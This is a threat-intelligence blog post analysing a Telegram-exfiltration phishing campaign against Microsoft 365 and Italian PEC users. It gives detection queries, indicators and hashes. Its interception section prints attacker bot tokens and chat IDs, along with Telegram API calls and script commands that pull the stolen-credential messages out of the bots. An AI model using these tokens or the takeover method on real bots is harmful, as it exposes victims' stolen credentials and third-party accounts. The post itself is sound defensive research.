Using a search by webpage titles on urlscan.io, we were able to identify a number of sites associated with this phishing campaign. 

Query used: page.title:”One Note | Microsoft” OR page.title:”Aruba | PEC” 

The oldest submission dates back to January 29, 2022: https://urlscan.io/result/b4584a98-d35d-4c08-89e8-7208f903fb2d/#summary 

The visual appearance of the phishing page in this case matches what we’ve seen in previously analyzed samples. 

Distinctive features of the older variant: 

• Uses obfuscation via URL encoding 

• Employs a different exfiltration method via a POST request to submit data through a web form (the URL was no longer accessible at the time of research), with the login and password entered into designated form fields. 

Samples dating back to February 2, 2022, began using the Telegram bot-based exfiltration method described earlier. Obfuscation was implemented through nested URL encoding (typically 2 to 4 levels deep). 

Starting with the sample from August 23, 2023, functionality was added to identify and exfiltrate the victim’s IP address. 

At some point, the threat actor experimented with using Base64 obfuscation for the phishing page but later abandoned this technique for unknown reasons. 

Observation period for Base64 obfuscation:  July 1, 2024 – December 3, 2024 

Evolution of the Phishing Page Mechanisms 

Key Insights on the Phishing Campaign 

As a result of this analysis, we’ve outlined key insights into the nature and structure of the phishing campaign under investigation. 

We identified the active timeline, clarified the target audience, and examined the technical details of the phishing tools used throughout the campaign. While the operation is relatively low in volume and visibility compared to other campaigns, it remains active to this day with phishing pages and Telegram-based exfiltration infrastructure still operational, indicating a continued potential for harm. 

The primary objective of the campaign is the harvesting of credentials for Microsoft 365 services (including Outlook, OneNote, etc.) and Italy’s PEC (Posta Elettronica Certificata), a national certified email system. These stolen credentials are likely intended for brokered access resale within cybercriminal ecosystems. 

From a technical standpoint, the campaign is neither advanced nor innovative: 

• Low-effort phishing pages, both in terms of social engineering and evasion techniques 

• Reliance on easily accessible, off-the-shelf infrastructure (e.g., Notion, Glitch, Google Docs, RenderForest) 

This suggests either a low level of technical expertise on the part of the attacker or a lack of focus on the credential theft process itself, supporting the hypothesis that the campaign’s true value lies in access brokering, not execution. 

Investigating the Attacker’s Profile Through Telegram Bot Exfiltration 

In this section, we’ll attempt to refine the attacker profile by analyzing the structure and contents of the stolen data, based on insights gathered during the technical analysis of the exfiltration infrastructure. 

With access to information about the Telegram bots used by the threat actor, we can attempt to retrieve the chat data where victims’ credentials were sent. To do this, we’ll follow the methodology outlined in ANY.RUN’s previously published guide. 

This section focuses on the practical application of that approach. For a deeper dive into the underlying mechanics, refer to the original source: How to Intercept Data Exfiltrated by Malware via Telegram and Discord 

Telegram Exfil Interception

Let’s start with the bot identified in the following analysis: View analysis session 

• Name: Sultanna 

• Username: @Sultannanewbot 

• Token: 7547274214:AAE2ImiQOBUm1JXvTk0sXfZNaZP2J4wL9sE 

• Exfiltration Chat ID: 6475928726 

To proceed safely, we’ll create a private Telegram group and enable the anonymous message sending option to protect our identity during the interaction. 

Next, we’ll check whether the bot in question is using webhooks. If webhooks are enabled, the attacker is likely to detect the interception attempt quickly, since webhook requests also transmit the secret bot token, potentially alerting the operator in real time. 

We’ll now send a request to the /getWebhookInfo endpoint via a browser to check the current webhook status for the bot. The response is in JSON format:

https://api.telegram.org/bot7547274214:AAE2ImiQOBUm1JXvTk0sXfZNaZP2J4wL9sE/getWebhookInfo

This bot does not have any webhooks configured (no URLs are listed in the API’s JSON response), which reduces the likelihood of the attacker detecting interference with the exfiltration infrastructure. 

After completing the initial checks, we’ll use the script set provided in the following article:  https://github.com/anyrun/blog-scripts/tree/main/Scripts/TelegramAPI 

First, let’s prepare the bot for analysis: 

1. Run the prepare_bot.py script, passing the bot token as an argument 

2. Synchronize the bot’s update history 

3. Add the bot to the previously created private group 

4. Delete the message that logs the bot’s addition to the group 

5. Retrieve the group ID, which will be needed in the next stage of analysis 

Prepare_bot.py: 

python3 prepare_bot.py bot7547274214:AAE2ImiQOBUm1JXvTk0sXfZNaZP2J4wL9sE 

Now, let’s run the forward_message.py script to make the bot forward messages from the exfiltration chat (the chat_id specified in the phishing page) to our newly created private group: 

Forward_message.py: 

python3 forward_message.py bot7547274214:AAE2ImiQOBUm1JXvTk0sXfZNaZP2J4wL9sE 6475928726 -1002412181543 

As a result, we begin to see the messages forwarded by the bot appearing in our group chat: 

To intercept messages in bulk rather than one at a time, we can run the forward_messages.py script using the same arguments as forward_message.py. This approach allows us to quantify the scale of the data leakage caused by the phishing campaign under analysis. 

After analyzing the email addresses of users whose data was stolen during the phishing campaign, we can confirm our initial assumption: the campaign is primarily targeting Italian users and businesses. Examples of affected domains include: 

• aedsrl.it – warehouse logistics and automation 

• legalmail.it – certification authority and PEC (certified email) solutions for corporate communications 

• steelsystembuilding.it – logistics and warehouse services 

• gruppoamag.it – public utilities and environmental services 

• goetsch-transporte.it – freight transport; a German company operating in Italy 

This conclusion is further supported by: 

• The use of Italian language in phishing lures and page content 

• Subdomain names hosting the phishing content, which include Italian words 

To expand or refine our understanding of the threat landscape, we will now examine the bot found in a sandbox session featuring an English-language phishing page: 

View analysis session 

Bot information: 

• Name: remaxx24 

• Username: @remaxx24bot 

• Token: 7072331661:AAEnFxNxOI162AVQUCmfDHMdy6s4fGrnTZY 

• Chat ID: 5308217415 

We repeated the same steps as described earlier, and as a result, retrieved another batch of messages forwarded by the bot, containing freshly stolen credentials. 

This time, based on the intercepted IP addresses and email data, the victims appear to be located primarily in the United States, with no clear pattern regarding affected companies or industries. 

Finally, let’s examine another bot identified in the task dated August 26, 2024: View analysis session 

Bot details: 

• Name: Resultant 

• Username: @Resultantnewbot 

• Token: 6741707974:AAHGfsh1hk8WVtAfcISXgpZCTL-bpHNvQ_E 

• Chat ID: 6475928726 

An interesting detail here is that the bot from the older sandbox analysis session (over six months old) appears to be connected to the bot from a recent sandbox session dated April 7, 2025.

Specifically, both bot configurations share the same chat ID: 

• Name: Sultanna 

• Username: @Sultannanewbot 

• Token: 7547274214:AAE2ImiQOBUm1JXvTk0sXfZNaZP2J4wL9sE 

• Exfiltration Chat ID: 6475928726 

Once again, we launch the previously mentioned utilities and retrieve: 

Both of these bots appear to be linked to a Telegram account named Don, which was responsible for initiating the bots in the exfiltration group/channel via the /start command. Using the Telegram API, we were able to retrieve information about this account: 

https://api.telegram.org/bot6741707974:AAHGfsh1hk8WVtAfcISXgpZCTL-bpHNvQ_E/getChatMember?chat_id=6475928726&user_id=6475928726

However, we were unable to investigate the retrieved data any further. A lookup using the sender’s user_id did not yield any additional information. 

Attacker Profile 

By consolidating the clues uncovered during phishing page analysis and Telegram bot interception, we can outline the characteristics of the phishing campaign and enrich its threat context. 

Attack Vector

Phishing pages and email lures impersonating login portals for Microsoft services (OneNote, Outlook) and Italy’s Aruba PEC (Posta Elettronica Certificata). 

Phishing Mechanics

• Victim credentials are collected through fake login forms (email + password), and the IP address is gathered using the ipify service. 

• When the victim clicks the “Login” button, the stolen data is exfiltrated via Telegram bots through interactions with the Telegram API. 

• After submission, the user is redirected to the legitimate Microsoft login page to maintain the illusion of legitimacy. 

Victimology: 

• Countries: United States, Italy 

• Industries affected: Natural resources (gas), business/financial consulting, environmental services, energy, logistics, and digital identity providers (e.g., PEC and e-signature services) 

Objectives: 

• BEC (Business Email Compromise) 

• Credential Harvesting (MS OneNote, MS Outlook, etc.) 

Attribution & Threat Actor Assessment: 

There is not enough reliable evidence to attribute this campaign to any specific group or APT. Attribution is further complicated by the low number of samples and the slow operational tempo of the malicious activity. 

Distinct characteristics of the threat actor’s profile include: 

• Lack of obfuscation or only weak techniques (e.g., atob, nested URL encoding) 

• Poor mimicry of legitimate web content (low-quality phishing page design) 

• Use of off-the-shelf solutions (Telegram bots) as exfiltration and C2 infrastructure 

• Rudimentary defensive mechanisms; the only protection observed is a redirect to a legitimate login page after credentials are captured and exfiltrated 

These factors suggest a particular level of the attacker’s skill and motivation. Either the actor lacks technical sophistication, or they simply choose not to invest resources into more advanced phishing payloads, focusing instead on other parts of their operation, such as access brokering (selling harvested credentials to third parties for further exploitation). 

Conclusion and Detection Recommendations 

This case study demonstrated the practical application of the Telegram bot interception technique previously described on the ANY.RUN blog, using it to expand the threat landscape around a lesser-known phishing campaign focused on harvesting Microsoft and PEC credentials. 

Insights gained from the analysis of intercepted data allowed us to broaden the visibility of the campaign, from a single isolated case to a long-running trend that, as evidence suggests, may still be active today. 

The findings also helped refine the attacker profile potentially responsible for this phishing operation. 

Finally, based on the collected technical evidence, we can define practical recommendations for detecting and hunting malicious activity linked to this newly profiled phishing campaign: 

• Monitor behavioral patterns of suspicious pages, such as domain chains following the pattern: 

“Notion → Glitch → Telegram API” 

• Implement signature-based detection rules that identify Telegram bot activity in corporate network traffic 

• Monitor for activity matching the Tactics, Techniques, and Procedures (TTPs) associated with the threat actor described in this report 

TI Lookup Queries

• threatName:”telegram” AND (threatName:”phishing” OR threatName:”possible-phishing”) AND (domainName:”*.glitch.me”) 

• domainName:”notion” AND domainName:”glitch” 

urlscan.io Query

page.title:”One Note | Microsoft” OR page.title:”Aruba | PEC” 

Indicators of Compromise

• studiosperandio.notion[.]site 

• gleaming-foregoing-quicksand[.]glitch[.]me 

• seabbz.notion[.]site 

• ergonperizie.notion[.]site 

• f004.backblazeb2[.]com 

• charming-separated-rhubarb[.]glitch[.]me 

• 25348255-1243060.renderforestsites[.]com 

Urlscan.io IOCs

• inshared0-onenote-asx.pages[.]dev 

• onedriv-shared0-apx.pages[.]dev 

• onedriv1-switchview-asx.pages[.]dev 

• view0-onenote-doc3hmlgroup.pages[.]dev 

• doc91173-onenote-viewapx[.]vercel[.]app 

• file01173-onenote-view.vercel[.]app 

• hampshiredownsheepwales[.]com 

• charming-separated-rhubarb[.]glitch[.]me 

• lucky-leaf-dogwood.glitch[.]me 

• kindly-tropical-icicle.glitch[.]me 

• 1noteindex-view-apx.pages[.]dev 

• butternut-acidic-bambiraptor.glitch[.]me 

• onenote-shared-5a03.note46.workers[.]dev 

• saber-mercurial-tang.glitch[.]me 

• familiar-pewter-night.glitch[.]me 

• regular-classic-spade.glitch[.]me 

• trusting-impossible-koi.glitch[.]me 

• harmless-utopian-sodalite.glitch[.]me 

Hashes of HTML phishing pages (SHA-256)

• 2049afb27b7d71b311ef83205ec8c1397ed9b705b4f84517471cc41c8c1f29d1 

• 8a1cecaf7c6df616fae15dca013cea78d209f0e813b9aa75964de1f813d614e0 

• 7e5a3bb0cff67b2c1ff50544f956a903a6ff364c006033c0887d17019875040e 

• B1145accfe9485052186f5db3507a3ebd8796b8246bee3990711dc2381c703b4 

• 7bfccbc16df79c1b837b764bb19f15400b9be80f0d3d88130dbeba1e1965c5ae 

• 2969a13ecc2540287fe0f2971bc523c5668781944e5daad34d23e1291a3e67f3 

• A2346c9d602323359f99007eac73bc3bf4d62d0fed1af2e3e20e9a7d74cbf190 

• Faefef284cd76c17ecb747ed2c5a443e0b0653af29de972b62cea14f7c54edd2 

• F31113f3167e1d62f1908bf366892576cd521e0122a76d5f79eefaa9764e5d04 

• a5ca3ceebe83e4049ed5affc3403ddc2030ba0fad80392895df2f50711ad54ce 

Telegram Exfil Bot Tokens | chatID pairs

• 7547274214:AAE2ImiQOBUm1JXvTk0sXfZNaZP2J4wL9sE | 6475928726 

• 7072331661:AAEnFxNxOI162AVQUCmfDHMdy6s4fGrnTZY 

• 6741707974:AAHGfsh1hk8WVtAfcISXgpZCTL-bpHNvQ_E | 6475928726 

• 5305890750:AAHJnWdIMel23kaV_UWs9eha5IgXppE-b58 | 5308217415 

• 6875925240:AAG5htB1kiH-G8fYV4kzBs-GWOE0Q784oxM | 6978226203 

• 6913021003:AAFMWDSrZSLOxX34nOVRXmoOA8SUTMXiOgg | 5668726693 

• 6848015467:AAHTt8TTTYFKRX6B5euTg47sZF8j6q01oxQ | 1270872185 
   

The post How Adversary Telegram Bots Help to Reveal Threats: Case Study  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More